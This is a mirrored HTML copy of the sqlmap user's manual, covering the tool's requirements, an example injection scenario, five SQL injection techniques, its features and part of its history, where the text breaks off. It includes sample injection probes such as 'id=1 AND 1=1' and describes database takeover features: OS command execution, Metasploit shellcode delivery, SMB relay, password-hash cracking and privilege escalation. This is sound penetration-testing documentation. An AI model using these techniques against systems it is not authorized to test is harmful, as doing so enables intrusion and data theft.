mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
3204 lines
130 KiB
HTML
3204 lines
130 KiB
HTML
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|
|
<HTML>
|
|
<HEAD>
|
|
<META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.66">
|
|
<TITLE>sqlmap user's manual</TITLE>
|
|
</HEAD>
|
|
<BODY>
|
|
<H1>sqlmap user's manual</H1>
|
|
|
|
<H2>by
|
|
<A HREF="mailto:bernardo@sqlmap.org">Bernardo Damele A. G.</A>,
|
|
<A HREF="mailto:miroslav@sqlmap.org">Miroslav Stampar</A></H2>version 1.0-dev, XXX XX, 2012
|
|
<HR>
|
|
<EM>This document is the user's manual for
|
|
<A HREF="http://www.sqlmap.org">sqlmap</A>.</EM>
|
|
<HR>
|
|
<P>
|
|
<H2><A NAME="toc1">1.</A> <A HREF="README.html#s1">Introduction</A></H2>
|
|
|
|
<UL>
|
|
<LI><A NAME="toc1.1">1.1</A> <A HREF="README.html#ss1.1">Requirements</A>
|
|
<LI><A NAME="toc1.2">1.2</A> <A HREF="README.html#ss1.2">Scenario</A>
|
|
<LI><A NAME="toc1.3">1.3</A> <A HREF="README.html#ss1.3">Techniques</A>
|
|
<LI><A NAME="toc1.4">1.4</A> <A HREF="README.html#ss1.4">Demo</A>
|
|
</UL>
|
|
<P>
|
|
<H2><A NAME="toc2">2.</A> <A HREF="README.html#s2">Features</A></H2>
|
|
|
|
<UL>
|
|
<LI><A NAME="toc2.1">2.1</A> <A HREF="README.html#ss2.1">Generic features</A>
|
|
<LI><A NAME="toc2.2">2.2</A> <A HREF="README.html#ss2.2">Fingerprint and enumeration features</A>
|
|
<LI><A NAME="toc2.3">2.3</A> <A HREF="README.html#ss2.3">Takeover features</A>
|
|
</UL>
|
|
<P>
|
|
<H2><A NAME="toc3">3.</A> <A HREF="README.html#s3">History</A></H2>
|
|
|
|
<UL>
|
|
<LI><A NAME="toc3.1">3.1</A> <A HREF="README.html#ss3.1">2011</A>
|
|
<LI><A NAME="toc3.2">3.2</A> <A HREF="README.html#ss3.2">2010</A>
|
|
<LI><A NAME="toc3.3">3.3</A> <A HREF="README.html#ss3.3">2009</A>
|
|
<LI><A NAME="toc3.4">3.4</A> <A HREF="README.html#ss3.4">2008</A>
|
|
<LI><A NAME="toc3.5">3.5</A> <A HREF="README.html#ss3.5">2007</A>
|
|
<LI><A NAME="toc3.6">3.6</A> <A HREF="README.html#ss3.6">2006</A>
|
|
</UL>
|
|
<P>
|
|
<H2><A NAME="toc4">4.</A> <A HREF="README.html#s4">Download and update</A></H2>
|
|
|
|
<P>
|
|
<H2><A NAME="toc5">5.</A> <A HREF="README.html#s5">Usage</A></H2>
|
|
|
|
<UL>
|
|
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Output verbosity</A>
|
|
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Target</A>
|
|
<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Request</A>
|
|
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Optimization</A>
|
|
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Injection</A>
|
|
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Detection</A>
|
|
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Techniques</A>
|
|
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Fingerprint</A>
|
|
<LI><A NAME="toc5.9">5.9</A> <A HREF="README.html#ss5.9">Enumeration</A>
|
|
<LI><A NAME="toc5.10">5.10</A> <A HREF="README.html#ss5.10">Brute force</A>
|
|
<LI><A NAME="toc5.11">5.11</A> <A HREF="README.html#ss5.11">User-defined function injection</A>
|
|
<LI><A NAME="toc5.12">5.12</A> <A HREF="README.html#ss5.12">File system access</A>
|
|
<LI><A NAME="toc5.13">5.13</A> <A HREF="README.html#ss5.13">Operating system takeover</A>
|
|
<LI><A NAME="toc5.14">5.14</A> <A HREF="README.html#ss5.14">Windows registry access</A>
|
|
<LI><A NAME="toc5.15">5.15</A> <A HREF="README.html#ss5.15">General</A>
|
|
<LI><A NAME="toc5.16">5.16</A> <A HREF="README.html#ss5.16">Miscellaneous</A>
|
|
</UL>
|
|
<P>
|
|
<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">License and copyright</A></H2>
|
|
|
|
<P>
|
|
<H2><A NAME="toc7">7.</A> <A HREF="README.html#s7">Disclaimer</A></H2>
|
|
|
|
<P>
|
|
<H2><A NAME="toc8">8.</A> <A HREF="README.html#s8">Authors</A></H2>
|
|
|
|
|
|
<HR>
|
|
<H2><A NAME="s1">1.</A> <A HREF="#toc1">Introduction</A></H2>
|
|
|
|
<P>sqlmap is an open source penetration testing tool that automates the
|
|
process of detecting and exploiting SQL injection flaws and taking over of
|
|
database servers. It comes with a powerful detection engine, many niche
|
|
features for the ultimate penetration tester and a broad range of switches
|
|
lasting from database fingerprinting, over data fetching from the
|
|
database, to accessing the underlying file system and executing commands
|
|
on the operating system via out-of-band connections.</P>
|
|
|
|
|
|
<H2><A NAME="ss1.1">1.1</A> <A HREF="#toc1.1">Requirements</A>
|
|
</H2>
|
|
|
|
<P>sqlmap is developed in
|
|
<A HREF="http://www.python.org">Python</A>,
|
|
a dynamic, object-oriented, interpreted programming language freely available from
|
|
<A HREF="http://python.org/download/">http://python.org/download/</A>.
|
|
This makes sqlmap a cross-platform application which is independant of the
|
|
operating system. sqlmap requires Python version <B>2.6</B> or above.
|
|
To make it even easier, many GNU/Linux distributions come out of the box
|
|
with Python installed. Other Unixes and Mac OSX also provide Python packaged
|
|
and ready to be installed.
|
|
Windows users can download and install the Python installer for x86, AMD64 and Itanium.</P>
|
|
<P>sqlmap relies on the
|
|
<A HREF="http://metasploit.com">Metasploit Framework</A> for some of its post-exploitation takeover
|
|
features. You need to grab a copy of the framework from the
|
|
<A HREF="http://metasploit.com/download/">download</A>
|
|
page - the required version is <B>3.5</B> or higher.
|
|
For the ICMP tunneling out-of-band takeover technique, sqlmap requires the
|
|
<A HREF="http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket">Impacket</A> library too.</P>
|
|
<P>If you are willing to connect directly to a database server (<CODE>-d</CODE> switch),
|
|
without passing through the web application, you need to install Python bindings
|
|
for the database management system that you are going to attack:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>Firebird:
|
|
<A HREF="http://kinterbasdb.sourceforge.net/">python-kinterbasdb</A>.</LI>
|
|
<LI>Microsoft Access:
|
|
<A HREF="http://pyodbc.googlecode.com/">python-pyodbc</A>.</LI>
|
|
<LI>Microsoft SQL Server:
|
|
<A HREF="http://pymssql.sourceforge.net/">python-pymssql</A>.</LI>
|
|
<LI>MySQL:
|
|
<A HREF="http://code.google.com/p/pymysql/">python pymysql</A>.</LI>
|
|
<LI>Oracle:
|
|
<A HREF="http://cx-oracle.sourceforge.net/">python cx_Oracle</A>.</LI>
|
|
<LI>PostgreSQL:
|
|
<A HREF="http://initd.org/psycopg/">python-psycopg2</A>.</LI>
|
|
<LI>SQLite:
|
|
<A HREF="http://pysqlite.googlecode.com/">python-pysqlite2</A>.</LI>
|
|
<LI>Sybase:
|
|
<A HREF="http://pymssql.sourceforge.net/">python-pymssql</A>.</LI>
|
|
</UL>
|
|
</P>
|
|
<P>If you plan to attack a web application behind NTLM authentication or use
|
|
the sqlmap update functionality (<CODE>-</CODE><CODE>-update</CODE> switch) you need to
|
|
install respectively
|
|
<A HREF="http://code.google.com/p/python-ntlm/">python-ntlm</A> and
|
|
<A HREF="http://pysvn.tigris.org/">python-svn</A> libraries respectively.</P>
|
|
<P>Optionally, if you are running sqlmap on Windows, you may wish to install the
|
|
<A HREF="http://ipython.scipy.org/moin/PyReadline/Intro">PyReadline</A>
|
|
library in order to take advantage of the sqlmap TAB completion and
|
|
history support features in the SQL shell and OS shell.
|
|
Note that these functionalities are available natively via the standard Python
|
|
<A HREF="http://docs.python.org/library/readline.html">readline</A>
|
|
library on other operating systems.</P>
|
|
<P>You can also choose to install the
|
|
<A HREF="http://psyco.sourceforge.net/">Psyco</A> library to eventually speed up the sqlmap algorithmic
|
|
operations.</P>
|
|
|
|
|
|
<H2><A NAME="ss1.2">1.2</A> <A HREF="#toc1.2">Scenario</A>
|
|
</H2>
|
|
|
|
<H3>Detect and exploit a SQL injection</H3>
|
|
|
|
<P>Let's say that you are auditing a web application and found a web page
|
|
that accepts dynamic user-provided values via <CODE>GET</CODE>, <CODE>POST</CODE>
|
|
or <CODE>Cookie</CODE> parameters or via the HTTP <CODE>User-Agent</CODE>
|
|
request header.
|
|
You now want to test if these are affected by a SQL injection
|
|
vulnerability, and if so, exploit them to retrieve as much information as
|
|
possible from the back-end database management system, or even be able to
|
|
access the underlying file system and operating system.</P>
|
|
<P>In a simple world, consider that the target url is:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</CODE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
<P>Assume that:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1</CODE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
<P>is the same page as the original one and (the condition evaluates to <B>True</B>):</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2</CODE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
<P>differs from the original one (the condition evaluates to <B>False</B>).
|
|
This likely means that you are in front of a SQL
|
|
injection vulnerability in the <CODE>id</CODE> <CODE>GET</CODE> parameter of the
|
|
<CODE>index.php</CODE> page. Additionally, no sanitisation of user's supplied
|
|
input is taking place before the SQL statement is sent to the
|
|
back-end database management system.</P>
|
|
<P>This is quite a common flaw in dynamic content web applications and it
|
|
does not depend upon the back-end database management system nor on the web
|
|
application programming language; it is a flaw within the application code.
|
|
The
|
|
<A HREF="http://www.owasp.org">Open Web Application Security Project</A>
|
|
rated this class of vulnerability as the
|
|
<A HREF="http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202010.pdf">most common</A> and serious web application vulnerability in their
|
|
<A HREF="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">Top Ten</A> list from 2010.</P>
|
|
<P>Now that you have found the vulnerable parameter, you can exploit it by
|
|
manipulating the <CODE>id</CODE> parameter value in the HTTP request.</P>
|
|
<P>Back to the scenario, we can make an educated guess about the probable
|
|
syntax of the SQL <CODE>SELECT</CODE> statement where the user supplied value is
|
|
being used in the <CODE>get_int.php</CODE> web page. In pseudo PHP code:</P>
|
|
<P>
|
|
<BLOCKQUOTE><CODE>
|
|
<CODE>$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];</CODE>
|
|
</CODE></BLOCKQUOTE>
|
|
</P>
|
|
<P>As you can see, appending a syntactically valid SQL statement that will
|
|
evaluate to a <EM>True</EM> condition after the value for the <CODE>id</CODE>
|
|
parameter (such as <CODE>id=1 AND 1=1</CODE>) will result in the web application
|
|
returning the same web page as in the original request (where no SQL
|
|
statement is added).
|
|
This is because the back-end database management system has evaluated the
|
|
injected SQL statement.
|
|
The previous example describes a simple boolean-based blind SQL injection
|
|
vulnerability.
|
|
However, sqlmap is able to detect any type of SQL injection flaw and adapt
|
|
its work-flow accordingly. </P>
|
|
<P>In this simple scenario it would also be possible to append, not just one or
|
|
more valid SQL conditions, but also (depending on the DBMS) stacked SQL
|
|
queries. For instance: <CODE>[...]&id=1;ANOTHER SQL QUERY#</CODE>.</P>
|
|
<P>sqlmap can automate the process of identifying and exploiting this type of
|
|
vulnerability.
|
|
Passing the original address, <CODE>http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</CODE>
|
|
to sqlmap, the tool will automatically:</P>
|
|
<P>
|
|
<UL>
|
|
<LI>Identify the vulnerable parameter(s) (<CODE>id</CODE> in this example);</LI>
|
|
<LI>Identify which SQL injection techniques can be used to exploit the
|
|
vulnerable parameter(s);</LI>
|
|
<LI>Fingerprint the back-end database management system;</LI>
|
|
<LI>Depending on the user's options, it will extensively fingerprint,
|
|
enumerate data or takeover the database server as a whole.</LI>
|
|
</UL>
|
|
|
|
...and depending on supplied options, it will enumerate data or takeover the
|
|
database server entirely.</P>
|
|
<P>There exist many
|
|
<A HREF="http://delicious.com/inquis/sqlinjection">resources</A>
|
|
on the web explaining in depth how to detect, exploit and prevent SQL
|
|
injection vulnerabilities in web applications. It is recommendeded that you read
|
|
them before going much further with sqlmap.</P>
|
|
|
|
<H3>Direct connection to the database management system</H3>
|
|
|
|
<P>Up until sqlmap version <B>0.8</B>, the tool has been <EM>yet another
|
|
SQL injection tool</EM>, used by web application penetration testers/newbies/curious
|
|
teens/computer addicted/punks and so on. Things move on
|
|
and as they evolve, we do as well. Now it supports this new switch,
|
|
<CODE>-d</CODE>, that allows you to connect from your machine to the database
|
|
server's TCP port where the database management system daemon is listening
|
|
on and perform any operation you would do while using it to attack a
|
|
database via a SQL injection vulnerability.</P>
|
|
|
|
|
|
<H2><A NAME="ss1.3">1.3</A> <A HREF="#toc1.3">Techniques</A>
|
|
</H2>
|
|
|
|
<P>sqlmap is able to detect and exploit five different SQL injection
|
|
<EM>types</EM>:</P>
|
|
<P>
|
|
<UL>
|
|
<LI><B>Boolean-based blind SQL injection</B>, also known as <B>inferential
|
|
SQL injection</B>: sqlmap replaces or appends to the affected parameter in
|
|
the HTTP request, a syntatically valid SQL statement string containing a
|
|
<CODE>SELECT</CODE> sub-statement, or any other SQL statement whose the user
|
|
want to retrieve the output.
|
|
For each HTTP response, by making a comparison between the HTTP response
|
|
headers/body with the original request, the tool inference the output of
|
|
the injected statement character by character. Alternatively, the user
|
|
can provide a string or regular expression to match on True pages.
|
|
The bisection algorithm implemented in sqlmap to perform this technique
|
|
is able to fetch each character of the output with a maximum of seven HTTP
|
|
requests. Where the output is not within the clear-text plain charset,
|
|
sqlmap will adapt the algorithm with bigger ranges to detect the output.</LI>
|
|
<LI><B>Time-based blind SQL injection</B>, also known as <B>full blind
|
|
SQL injection</B>: sqlmap replaces or appends to the affected parameter in
|
|
the HTTP request, a syntatically valid SQL statement string containing a
|
|
query which put on hold the back-end DBMS to return for a certain number
|
|
of seconds.
|
|
For each HTTP response, by making a comparison between the HTTP response
|
|
time with the original request, the tool inference the output of
|
|
the injected statement character by character. Like for boolean-based
|
|
technique, the bisection algorithm is applied.</LI>
|
|
<LI><B>Error-based SQL injection</B>: sqlmap replaces or appends to
|
|
the affected parameter a database-specific error message provoking statement
|
|
and parses the HTTP response headers and body in search of DBMS error messages
|
|
containing the injected pre-defined chain of characters and the subquery
|
|
statement output within. This technique works only when the web application
|
|
has been configured to disclose back-end database management system error
|
|
messages.</LI>
|
|
<LI><B>UNION query SQL injection</B>, also known as <B>inband SQL
|
|
injection</B>: sqlmap appends to the affected parameter a syntatically
|
|
valid SQL statement starting with an <CODE>UNION ALL SELECT</CODE>.
|
|
This techique works when the web application page passes directly the output
|
|
of the <CODE>SELECT</CODE> statement within a <CODE>for</CODE> loop, or similar, so
|
|
that each line of the query output is printed on the page content.
|
|
sqlmap is also able to exploit <B>partial (single entry) UNION query SQL
|
|
injection</B> vulnerabilities which occur when the output of the
|
|
statement is not cycled in a <CODE>for</CODE> construct, whereas only the first
|
|
entry of the query output is displayed.</LI>
|
|
<LI><B>Stacked queries SQL injection</B>, also known as <B>multiple
|
|
statements SQL injection</B>: sqlmap tests if the web application supports
|
|
stacked queries and then, in case it does support, it appends to the affected
|
|
parameter in the HTTP request, a semi-colon (<CODE>;</CODE>) followed by the
|
|
SQL statement to be executed. This technique is useful to run SQL
|
|
statements other than <CODE>SELECT</CODE>, like for instance, <EM>data
|
|
definition</EM> or <EM>data manipulation</EM> statements, possibly leading
|
|
to file system read and write access and operating system command
|
|
execution depending on the underlying back-end database management system
|
|
and the session user privileges.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="ss1.4">1.4</A> <A HREF="#toc1.4">Demo</A>
|
|
</H2>
|
|
|
|
<P>You can watch several demo videos, they are hosted on
|
|
<A HREF="http://www.youtube.com/user/inquisb#g/u">YouTube</A>.</P>
|
|
|
|
|
|
<H2><A NAME="s2">2.</A> <A HREF="#toc2">Features</A></H2>
|
|
|
|
<P>Features implemented in sqlmap include:</P>
|
|
|
|
|
|
<H2><A NAME="ss2.1">2.1</A> <A HREF="#toc2.1">Generic features</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI>Full support for <B>MySQL</B>, <B>Oracle</B>, <B>PostgreSQL</B>,
|
|
<B>Microsoft SQL Server</B>, <B>Microsoft Access</B>, <B>SQLite</B>,
|
|
<B>Firebird</B>, <B>Sybase</B> and <B>SAP MaxDB</B> database
|
|
management systems.
|
|
</LI>
|
|
<LI>Full support for five SQL injection techniques: <B>boolean-based
|
|
blind</B>, <B>time-based blind</B>, <B>error-based</B>,
|
|
<B>UNION query</B> and <B>stacked queries</B>.
|
|
</LI>
|
|
<LI>Support to <B>directly connect to the database</B> without passing
|
|
via a SQL injection, by providing DBMS credentials, IP address, port and
|
|
database name.
|
|
</LI>
|
|
<LI>It is possible to provide a single target URL, get the list of
|
|
targets from
|
|
<A HREF="http://portswigger.net/suite/">Burp proxy</A>
|
|
or
|
|
<A HREF="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab proxy</A> requests log files, get the whole HTTP request
|
|
from a text file or get the list of targets by providing sqlmap with a
|
|
Google dork which queries
|
|
<A HREF="http://www.google.com">Google</A> search engine and parses its results page. You can also
|
|
define a regular-expression based scope that is used to identify which of
|
|
the parsed addresses to test.
|
|
</LI>
|
|
<LI>Tests provided <B>GET</B> parameters, <B>POST</B> parameters,
|
|
HTTP <B>Cookie</B> header values, HTTP <B>User-Agent</B> header value
|
|
and HTTP <B>Referer</B> header value to identify and exploit SQL
|
|
injection vulnerabilities. It is also possible to specify a comma-separated
|
|
list of specific parameter(s) to test.
|
|
</LI>
|
|
<LI>Option to specify the <B>maximum number of concurrent HTTP(S)
|
|
requests (multi-threading)</B> to speed up the blind SQL injection
|
|
techniques. Vice versa, it is also possible to specify the number of
|
|
seconds to hold between each HTTP(S) request. Others optimization switches
|
|
to speed up the exploitation are implemented too.
|
|
</LI>
|
|
<LI><B>HTTP <CODE>Cookie</CODE> header</B> string support, useful when the
|
|
web application requires authentication based upon cookies and you have
|
|
such data or in case you just want to test for and exploit SQL injection
|
|
on such header values. You can also specify to always URL-encode the
|
|
Cookie.
|
|
</LI>
|
|
<LI>Automatically handles <B>HTTP <CODE>Set-Cookie</CODE> header</B> from
|
|
the application, re-establishing of the session if it expires. Test and
|
|
exploit on these values is supported too. Vice versa, you can also force
|
|
to ignore any <CODE>Set-Cookie</CODE> header.
|
|
</LI>
|
|
<LI>HTTP protocol <B>Basic, Digest, NTLM and Certificate
|
|
authentications</B> support.
|
|
</LI>
|
|
<LI><B>HTTP(S) proxy</B> support to pass by the requests to the target
|
|
application that works also with HTTPS requests and with authenticated
|
|
proxy servers.
|
|
</LI>
|
|
<LI>Options to fake the <B>HTTP <CODE>Referer</CODE> header</B> value and
|
|
the <B>HTTP <CODE>User-Agent</CODE> header</B> value specified by user or
|
|
randomly selected from a textual file.
|
|
</LI>
|
|
<LI>Support to increase the <B>verbosity level of output messages</B>:
|
|
there exist <B>seven levels</B> of verbosity.
|
|
</LI>
|
|
<LI>Support to <B>parse HTML forms</B> from the target URL and forge
|
|
HTTP(S) requests against those pages to test the form parameters against
|
|
vulnerabilities.
|
|
</LI>
|
|
<LI><B>Granularity and flexibility</B> in terms of both user's
|
|
switches and features.
|
|
</LI>
|
|
<LI><B>Estimated time of arrival</B> support for each query, updated
|
|
in real time, to provide the user with an overview on how long it will
|
|
take to retrieve the queries' output.
|
|
</LI>
|
|
<LI>Automatically saves the session (queries and their output, even if
|
|
partially retrieved) on a textual file in real time while fetching the
|
|
data and <B>resumes the injection</B> by parsing the session file.
|
|
</LI>
|
|
<LI>Support to read options from a configuration INI file rather than
|
|
specify each time all of the switches on the command line. Support also to
|
|
generate a configuration file based on the command line switches provided.
|
|
</LI>
|
|
<LI>Support to <B>replicate the back-end database tables structure and
|
|
entries</B> on a local SQLite 3 database.
|
|
</LI>
|
|
<LI>Option to update sqlmap to the latest development version from the
|
|
subversion repository.
|
|
</LI>
|
|
<LI>Support to parse HTTP(S) responses and display any DBMS error
|
|
message to the user.
|
|
</LI>
|
|
<LI>Integration with other IT security open source projects,
|
|
<A HREF="http://metasploit.com">Metasploit</A> and
|
|
<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="ss2.2">2.2</A> <A HREF="#toc2.2">Fingerprint and enumeration features</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>Extensive back-end database software version and underlying
|
|
operating system fingerprint</B> based upon
|
|
<A HREF="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html">error messages</A>,
|
|
<A HREF="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html">banner parsing</A>,
|
|
<A HREF="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html">functions output comparison</A> and
|
|
<A HREF="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html">specific features</A>
|
|
such as MySQL comment injection. It is also possible to force the back-end
|
|
database management system name if you already know it.
|
|
</LI>
|
|
<LI>Basic web server software and web application technology
|
|
fingerprint.
|
|
</LI>
|
|
<LI>Support to retrieve the DBMS <B>banner</B>, <B>session user</B>
|
|
and <B>current database</B> information. The tool can also check if the
|
|
session user is a <B>database administrator</B> (DBA).
|
|
</LI>
|
|
<LI>Support to enumerate <B>database users</B>, <B>users' password
|
|
hashes</B>, <B>users' privileges</B>, <B>users' roles</B>,
|
|
<B>databases</B>, <B>tables</B> and <B>columns</B>.
|
|
</LI>
|
|
<LI>Automatic recognition of password hashes format and support to
|
|
<B>crack them with a dictionary-based attack</B>.
|
|
</LI>
|
|
<LI>Support to <B>brute-force tables and columns name</B>. This is
|
|
useful when the session user has no read access over the system table
|
|
containing schema information or when the database management system does
|
|
not store this information anywhere (e.g. MySQL < 5.0).
|
|
</LI>
|
|
<LI>Support to <B>dump database tables</B> entirely, a range of
|
|
entries or specific columns as per user's choice. The user can also choose
|
|
to dump only a range of characters from each column's entry.
|
|
</LI>
|
|
<LI>Support to automatically <B>dump all databases</B>' schemas and
|
|
entries. It is possibly to exclude from the dump the system databases.
|
|
</LI>
|
|
<LI>Support to <B>search for specific database names, specific tables
|
|
across all databases or specific columns across all databases'
|
|
tables</B>. This is useful, for instance, to identify tables containing
|
|
custom application credentials where relevant columns' names contain
|
|
string like <EM>name</EM> and <EM>pass</EM>.
|
|
</LI>
|
|
<LI>Support to <B>run custom SQL statement(s)</B> as in an interactive
|
|
SQL client connecting to the back-end database. sqlmap automatically
|
|
dissects the provided statement, determines which technique fits best to
|
|
inject it and how to pack the SQL payload accordingly.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="ss2.3">2.3</A> <A HREF="#toc2.3">Takeover features</A>
|
|
</H2>
|
|
|
|
<P>Some of these techniques are detailed in the white paper
|
|
<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A> and in the
|
|
slide deck
|
|
<A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">Expanding the control over the operating system from the database</A>.</P>
|
|
<P>
|
|
<UL>
|
|
<LI>Support to <B>inject custom user-defined functions</B>: the user
|
|
can compile a shared library then use sqlmap to create within the back-end
|
|
DBMS user-defined functions out of the compiled shared library file. These
|
|
UDFs can then be executed, and optionally removed, via sqlmap. This is
|
|
supported when the database software is MySQL or PostgreSQL.
|
|
</LI>
|
|
<LI>Support to <B>download and upload any file</B> from the database
|
|
server underlying file system when the database software is MySQL,
|
|
PostgreSQL or Microsoft SQL Server.
|
|
</LI>
|
|
<LI>Support to <B>execute arbitrary commands and retrieve their
|
|
standard output</B> on the database server underlying operating system
|
|
when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
|
|
<UL>
|
|
<LI>On MySQL and PostgreSQL via user-defined function injection and
|
|
execution.</LI>
|
|
<LI>On Microsoft SQL Server via <CODE>xp_cmdshell()</CODE> stored procedure.
|
|
Also, the stored procedure is re-enabled if disabled or created from
|
|
scratch if removed by the DBA.</LI>
|
|
</UL>
|
|
|
|
</LI>
|
|
<LI>Support to <B>establish an out-of-band stateful TCP connection
|
|
between the attacker machine and the database server</B> underlying
|
|
operating system. This channel can be an interactive command prompt, a
|
|
Meterpreter session or a graphical user interface (VNC) session as per
|
|
user's choice.
|
|
sqlmap relies on Metasploit to create the shellcode and implements four
|
|
different techniques to execute it on the database server. These
|
|
techniques are:
|
|
<UL>
|
|
<LI>Database <B>in-memory execution of the Metasploit's shellcode</B>
|
|
via sqlmap own user-defined function <CODE>sys_bineval()</CODE>. Supported on
|
|
MySQL and PostgreSQL.</LI>
|
|
<LI>Upload and execution of a Metasploit's <B>stand-alone payload
|
|
stager</B> via sqlmap own user-defined function <CODE>sys_exec()</CODE> on
|
|
MySQL and PostgreSQL or via <CODE>xp_cmdshell()</CODE> on Microsoft SQL
|
|
Server.</LI>
|
|
<LI>Execution of Metasploit's shellcode by performing a <B>SMB
|
|
reflection attack</B> (
|
|
<A HREF="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx">MS08-068</A>) with a UNC path request from the database server to
|
|
the attacker's machine where the Metasploit <CODE>smb_relay</CODE> server
|
|
exploit listens. Supported when running sqlmap with high privileges
|
|
(<CODE>uid=0</CODE>) on Linux/Unix and the target DBMS runs as Administrator
|
|
on Windows.</LI>
|
|
<LI>Database in-memory execution of the Metasploit's shellcode by
|
|
exploiting <B>Microsoft SQL Server 2000 and 2005
|
|
<CODE>sp_replwritetovarbin</CODE> stored procedure heap-based buffer
|
|
overflow</B> (
|
|
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx">MS09-004</A>). sqlmap has its own exploit to trigger the
|
|
vulnerability with automatic DEP memory protection bypass, but it relies
|
|
on Metasploit to generate the shellcode to get executed upon successful
|
|
exploitation.</LI>
|
|
</UL>
|
|
|
|
</LI>
|
|
<LI>Support for <B>database process' user privilege escalation</B> via
|
|
Metasploit's <CODE>getsystem</CODE> command which include, among others,
|
|
the
|
|
<A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
|
|
<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>).
|
|
</LI>
|
|
<LI>Support to access (read/add/delete) Windows registry hives.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
|
|
<H2><A NAME="s3">3.</A> <A HREF="#toc3">History</A></H2>
|
|
|
|
<H2><A NAME="ss3.1">3.1</A> <A HREF="#toc3.1">2011</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>April 10</B>,
|
|
<A HREF="http://www.sqlmap.org/#developers">Bernardo and Miroslav</A> release sqlmap
|
|
<B>0.9</B> featuring a totally rewritten and powerful SQL injection
|
|
detection engine, the possibility to connect directly to a database
|
|
server, support for time-based blind SQL injection and error-based SQL
|
|
injection, support for four new database management systems and much more.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<H2><A NAME="ss3.2">3.2</A> <A HREF="#toc3.2">2010</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>December</B>,
|
|
<A HREF="http://www.sqlmap.org/#developers">Bernardo and Miroslav</A> have enhanced sqlmap a
|
|
lot during the whole year and prepare to release sqlmap <B>0.9</B>
|
|
within the first quarter of 2011.</LI>
|
|
<LI><B>June 3</B>, Bernardo
|
|
<A HREF="http://www.slideshare.net/inquis/ath-con-2010bernardodamelegotdbownnet">presents</A>
|
|
a talk titled <EM>Got database access? Own the network!</EM> at AthCon
|
|
2010 in Athens (Greece).</LI>
|
|
<LI><B>March 14</B>,
|
|
<A HREF="http://www.sqlmap.org/#developers">Bernardo and Miroslav</A> release stable version of
|
|
sqlmap <B>0.8</B> featuring many features. Amongst these, support to
|
|
enumerate and dump all databases' tables containing user provided
|
|
column(s), stabilization and enhancements to the takeover functionalities,
|
|
updated integration with Metasploit 3.3.3 and a lot of minor features and
|
|
bug fixes.</LI>
|
|
<LI><B>March</B>, sqlmap demo videos have been
|
|
<A HREF="http://www.youtube.com/inquisb#g/u">published</A>.</LI>
|
|
<LI><B>January</B>, Bernardo is
|
|
<A HREF="http://www.athcon.org/speakers/">invited</A> to present at
|
|
<A HREF="http://www.athcon.org/archives/2010-2/">AthCon</A> conference in
|
|
Greece on June 2010.</LI>
|
|
</UL>
|
|
</P>
|
|
|
|
<H2><A NAME="ss3.3">3.3</A> <A HREF="#toc3.3">2009</A>
|
|
</H2>
|
|
|
|
<P>
|
|
<UL>
|
|
<LI><B>December 18</B>, Miroslav Stampar replies to the call for
|
|
developers. Along with Bernardo, he actively develops sqlmap from version
|
|
<B>0.8 release candidate 2</B>.
|
|
</LI>
|
|
<LI><B>December 12</B>, Bernardo writes to the mailing list a post
|
|
titled
|
|
